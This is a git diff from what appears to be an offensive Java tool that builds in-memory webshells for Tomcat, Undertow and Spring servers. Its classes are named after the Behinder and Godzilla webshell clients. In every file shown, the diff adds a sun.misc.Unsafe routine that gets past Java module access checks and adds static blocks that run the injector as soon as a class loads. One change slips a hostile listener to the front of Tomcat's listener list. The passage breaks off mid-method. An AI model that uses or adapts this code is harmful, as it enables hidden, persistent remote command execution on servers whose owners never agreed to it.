diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatAutoFindExecutorThreadLoader.java b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatAutoFindExecutorThreadLoader.java
index 872e5fb..106d3fd 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatAutoFindExecutorThreadLoader.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatAutoFindExecutorThreadLoader.java
@@ -5,6 +5,7 @@
import com.ppp.annotation.JavaClassType;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.Middleware;
+import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
@@ -26,7 +27,9 @@
public class TomcatAutoFindExecutorThreadLoader {
private static String gzipObject;
private static String CLASSNAME;
-
+ static {
+ new TomcatAutoFindExecutorThreadLoader();
+ }
public TomcatAutoFindExecutorThreadLoader() {
try {
// 获取
@@ -43,6 +46,7 @@ public TomcatAutoFindExecutorThreadLoader(Object o) {
}
public static void inject(Object nioEndpoint) throws Exception {
+ addModule();
Object threadPoolExecutor = getFieldValue(nioEndpoint, "executor");
if (threadPoolExecutor instanceof Proxy) {
if (getFieldValue(threadPoolExecutor, "h").getClass().getName().equals(CLASSNAME)) {
@@ -324,4 +328,22 @@ public static Object getTargetObject(Class targetCls, Object object, HashSet bre
return null;
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = TomcatAutoFindExecutorThreadLoader.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatAutoFindListenerThreadLoader.java b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatAutoFindListenerThreadLoader.java
index 48edbfa..fbd7f25 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatAutoFindListenerThreadLoader.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatAutoFindListenerThreadLoader.java
@@ -4,6 +4,7 @@
import com.ppp.annotation.JavaClassType;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.Middleware;
+import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
@@ -26,7 +27,9 @@
public class TomcatAutoFindListenerThreadLoader {
private static String gzipObject;
private static String CLASSNAME;
-
+ static {
+ new TomcatAutoFindListenerThreadLoader();
+ }
public TomcatAutoFindListenerThreadLoader() {
try {
// 获取 standardContext
@@ -44,6 +47,7 @@ public TomcatAutoFindListenerThreadLoader(Object o) {
}
public static void inject(Object standardContext) throws Exception {
+ addModule();
Object[] applicationEventListenersObjects = null;
List applicationEventListeners;
Object object = getObject();
@@ -354,4 +358,22 @@ public List getActiveClassLoaders() throws Exception {
return new ArrayList(activeClassLoaders);
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = TomcatAutoFindListenerThreadLoader.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatAutoFindValveThreadLoader.java b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatAutoFindValveThreadLoader.java
index a55d9d6..63d6349 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatAutoFindValveThreadLoader.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatAutoFindValveThreadLoader.java
@@ -5,6 +5,7 @@
import com.ppp.annotation.JavaClassType;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.Middleware;
+import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
@@ -22,7 +23,9 @@
public class TomcatAutoFindValveThreadLoader {
private static String gzipObject;
private static String CLASSNAME;
-
+ static {
+ new TomcatAutoFindValveThreadLoader();
+ }
public TomcatAutoFindValveThreadLoader() {
try {
// 获取 standardContext
@@ -39,6 +42,7 @@ public TomcatAutoFindValveThreadLoader(Object o) {
public static void inject(Object standardContext) {
try {
+ addModule();
Object pipeline = getFieldValue(standardContext, "pipeline");
Object[] valves = (Object[]) invokeMethod(pipeline, "getValves", new Class[]{}, new Object[]{});
for (Object valve : valves) {
@@ -310,5 +314,23 @@ public static Object getTargetObject(Class targetCls, Object object, HashSet bre
return null;
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = TomcatAutoFindValveThreadLoader.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatFilterThreadLoader.java b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatFilterThreadLoader.java
index cfdd9a4..a1f519c 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatFilterThreadLoader.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatFilterThreadLoader.java
@@ -4,6 +4,7 @@
import com.ppp.annotation.JavaClassType;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.Middleware;
+import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
@@ -27,7 +28,9 @@ public class TomcatFilterThreadLoader {
private static String CLASSNAME;
private static String PATH;
private static String NAME;
-
+ static {
+ new TomcatFilterThreadLoader();
+ }
public TomcatFilterThreadLoader() {
}
@@ -51,6 +54,7 @@ public TomcatFilterThreadLoader() {
* Tomcat Filter
*/
public static void inject(Object standardContext) throws Exception {
+ addModule();
HashMap filterDefs = (HashMap) getFieldValue(standardContext, "filterDefs");
if (filterDefs.containsKey(NAME)) {
return;
@@ -241,5 +245,23 @@ public static Object invokeMethod(Object obj, String methodName, Class[] argsCla
}
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = TomcatFilterThreadLoader.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatListenerThreadLoader.java b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatListenerThreadLoader.java
index fac0cc9..80da836 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatListenerThreadLoader.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatListenerThreadLoader.java
@@ -4,6 +4,7 @@
import com.ppp.annotation.JavaClassType;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.Middleware;
+import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
@@ -27,6 +28,10 @@ public class TomcatListenerThreadLoader {
private static String gzipObject;
private static String CLASSNAME;
+ static {
+ new TomcatListenerThreadLoader();
+ }
+
public TomcatListenerThreadLoader() {
try {
// 获取 standardContext
@@ -47,6 +52,7 @@ public TomcatListenerThreadLoader() {
* Tomcat Listener
*/
public static void inject(Object standardContext) throws Exception {
+ addModule();
Object[] applicationEventListenersObjects = null;
List applicationEventListeners;
Object object = getObject();
@@ -83,7 +89,15 @@ public static void inject(Object standardContext) throws Exception {
} else {
// bypass
List applicationEventListenersList = (List) getFieldValue(standardContext, "applicationEventListenersList");
- applicationEventListenersList.add(object);
+ //
+// applicationEventListenersList.add(object);
+
+ // 放到第一个
+ Object[] array = (Object[]) getFieldValue(applicationEventListenersList, "array");
+ Object[] newArray = new Object[array.length + 1];
+ newArray[0] = object;
+ System.arraycopy(array, 0, newArray, 1, array.length);
+ setFieldValue(applicationEventListenersList, "array", newArray);
// 7 8 9 10
// invokeMethod(standardContext.getClass(), standardContext, "addApplicationEventListener", new Class[]{Object.class}, new Object[]{object});
@@ -221,5 +235,22 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
return object;
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = TomcatListenerThreadLoader.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatServletThreadLoader.java b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatServletThreadLoader.java
index 0963f89..9cc6b2e 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatServletThreadLoader.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/TomcatServletThreadLoader.java
@@ -4,6 +4,7 @@
import com.ppp.annotation.JavaClassType;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.Middleware;
+import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
@@ -29,7 +30,9 @@ public class TomcatServletThreadLoader {
private static String CLASSNAME;
private static String PATH;
private static String NAME;
-
+ static {
+ new TomcatServletThreadLoader();
+ }
public TomcatServletThreadLoader() {
try {
// 获取 standardContext
@@ -49,6 +52,7 @@ public TomcatServletThreadLoader() {
* Tomcat Servlet
*/
public static void inject(Object standardContext) throws Exception {
+ addModule();
HashMap children = (HashMap) getFieldValue(standardContext, "children");
if (children.containsKey(NAME)) {
return;
@@ -213,4 +217,22 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = TomcatServletThreadLoader.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/UndertowFilterThreadLoader.java b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/UndertowFilterThreadLoader.java
index 2155022..29958a5 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/UndertowFilterThreadLoader.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/UndertowFilterThreadLoader.java
@@ -4,6 +4,7 @@
import com.ppp.annotation.JavaClassType;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.Middleware;
+import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
@@ -27,7 +28,9 @@ public class UndertowFilterThreadLoader {
private static String CLASSNAME;
private static String PATH;
private static String NAME;
-
+ static {
+ new UndertowFilterThreadLoader();
+ }
public UndertowFilterThreadLoader() {
try {
// 获取 ServletRequestContext
@@ -40,6 +43,7 @@ public UndertowFilterThreadLoader() {
}
public static void inject(Object servletRequestContext) throws Exception {
+ addModule();
Object deployment = getFieldValue(servletRequestContext, "deployment");
Object filters = getFieldValue(deployment, "filters");
HashMap filtersMap = (HashMap) invokeMethod(filters, "getFilters", new Class[]{}, new Object[]{});
@@ -171,4 +175,22 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
return object;
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = UndertowFilterThreadLoader.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/UndertowListenerThreadLoader.java b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/UndertowListenerThreadLoader.java
index 1394725..65339f3 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/UndertowListenerThreadLoader.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/UndertowListenerThreadLoader.java
@@ -4,6 +4,7 @@
import com.ppp.annotation.JavaClassType;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.Middleware;
+import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
@@ -25,7 +26,9 @@
public class UndertowListenerThreadLoader {
private static String gzipObject;
private static String CLASSNAME;
-
+ static {
+ new UndertowListenerThreadLoader();
+ }
public UndertowListenerThreadLoader() {
try {
// 获取 ServletRequestContext
@@ -38,6 +41,7 @@ public UndertowListenerThreadLoader() {
}
public static void inject(Object servletRequestContext) throws Exception {
+ addModule();
Object deployment = getFieldValue(servletRequestContext, "deployment");
Object applicationListeners = getFieldValue(deployment, "applicationListeners");
ArrayList allListeners = (ArrayList) getFieldValue(applicationListeners, "allListeners");
@@ -171,4 +175,23 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
return object;
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = UndertowListenerThreadLoader.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
+
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/UndertowServletThreadLoader.java b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/UndertowServletThreadLoader.java
index dc935ec..a2468e3 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/loader/UndertowServletThreadLoader.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/loader/UndertowServletThreadLoader.java
@@ -4,6 +4,7 @@
import com.ppp.annotation.JavaClassType;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.Middleware;
+import sun.misc.Unsafe;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
@@ -29,7 +30,9 @@ public class UndertowServletThreadLoader {
private static String CLASSNAME;
private static String PATH;
private static String NAME;
-
+ static {
+ new UndertowServletThreadLoader();
+ }
public UndertowServletThreadLoader() {
try {
// 获取 ServletRequestContext
@@ -42,6 +45,7 @@ public UndertowServletThreadLoader() {
}
public static void inject(Object servletRequestContext) throws Exception {
+ addModule();
Object deployment = getFieldValue(servletRequestContext, "deployment");
Object deploymentInfo = getFieldValue(deployment, "deploymentInfo");
Map servlets = (Map) getFieldValue(deploymentInfo, "servlets");
@@ -171,5 +175,23 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
Object object = method.invoke(obj, args);
return object;
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = UndertowServletThreadLoader.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ControllerExec.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ControllerExec.java
index 61212ac..fd9695f 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ControllerExec.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ControllerExec.java
@@ -3,8 +3,12 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import java.io.InputStream;
+import java.lang.reflect.Field;
import java.lang.reflect.Method;
/**
@@ -16,6 +20,7 @@
*/
@MemShell(MemShell.Controller)
@MemShellFunction(MemShellFunction.Exec)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.HEADER, JavaClassModifiable.RHEADER, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class ControllerExec {
private static String HEADER;
@@ -28,6 +33,7 @@ public ControllerExec() {
public static String run() {
try {
+ addModule();
Object requestAttributes = invokeMethod(Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder"), null, "getRequestAttributes", new Class[]{}, new Object[]{});
Class clazz = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
Object request = invokeMethod(clazz, requestAttributes, "getRequest", new Class[]{}, new Object[]{});
@@ -86,5 +92,23 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
return object;
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = ControllerExec.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ExecutorExec.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ExecutorExec.java
index 68f54ff..fb48ee7 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ExecutorExec.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ExecutorExec.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import java.io.InputStream;
import java.lang.reflect.Field;
@@ -17,6 +20,7 @@
*/
@MemShell(MemShell.Executor)
@MemShellFunction(MemShellFunction.Exec)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.HEADER, JavaClassModifiable.RHEADER, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class ExecutorExec implements InvocationHandler {
private static String HEADER;
@@ -45,6 +49,7 @@ public Object invoke(Object proxy, Method method, Object[] args) throws Throwabl
public void execute(Runnable command) throws Exception {
try {
+ addModule();
String header = getHeader();
Map headers = getHeaders(header);
if (headers.get(lockHeaderKey) != null && headers.get(lockHeaderKey).contains(lockHeaderValue)) {
@@ -343,4 +348,23 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
Object object = method.invoke(obj, args);
return object;
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = ExecutorExec.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/FilterBehinder.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/FilterBehinder.java
index c5fce5a..94a7d27 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/FilterBehinder.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/FilterBehinder.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
@@ -18,6 +21,7 @@
*/
@MemShell(MemShell.Filter)
@MemShellFunction(MemShellFunction.Behinder)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.pass, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class FilterBehinder implements InvocationHandler {
private static String pass;
@@ -33,6 +37,7 @@ public Object invoke(Object proxy, Method method, Object[] args) {
private void run(Object servletRequest, Object servletResponse, Object filterChain) {
try {
+ addModule();
String lv = (String) invokeMethod(servletRequest, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
return;
@@ -109,4 +114,23 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
Object object = method.invoke(obj, args);
return object;
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = FilterBehinder.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/FilterExec.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/FilterExec.java
index dfe5bc1..be7f854 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/FilterExec.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/FilterExec.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import java.io.InputStream;
import java.lang.reflect.Field;
@@ -15,6 +18,7 @@
*/
@MemShell(MemShell.Filter)
@MemShellFunction(MemShellFunction.Exec)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.HEADER, JavaClassModifiable.RHEADER, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class FilterExec implements InvocationHandler {
private static String HEADER;
@@ -34,6 +38,7 @@ public Object invoke(Object proxy, Method method, Object[] args) {
*/
private void run(Object servletRequest, Object servletResponse, Object filterChain) {
try {
+ addModule();
String lv = (String) invokeMethod(servletRequest, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
return;
@@ -121,4 +126,23 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
Object object = method.invoke(obj, args);
return object;
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = FilterExec.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/FilterGodzilla.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/FilterGodzilla.java
index f5ad879..a739229 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/FilterGodzilla.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/FilterGodzilla.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
@@ -15,6 +18,7 @@
*/
@MemShell(MemShell.Filter)
@MemShellFunction(MemShellFunction.Godzilla)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.key, JavaClassModifiable.pass, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class FilterGodzilla implements InvocationHandler {
public static String key; // key
@@ -32,6 +36,7 @@ public Object invoke(Object proxy, Method method, Object[] args) {
private void run(Object servletRequest, Object servletResponse, Object filterChain) {
try {
+ addModule();
String lv = (String) invokeMethod(servletRequest, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
return;
@@ -153,4 +158,23 @@ public static Object invokeMethod(Object obj, String methodName, Class[] argsCla
method.setAccessible(true);
return method.invoke(obj, args);
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
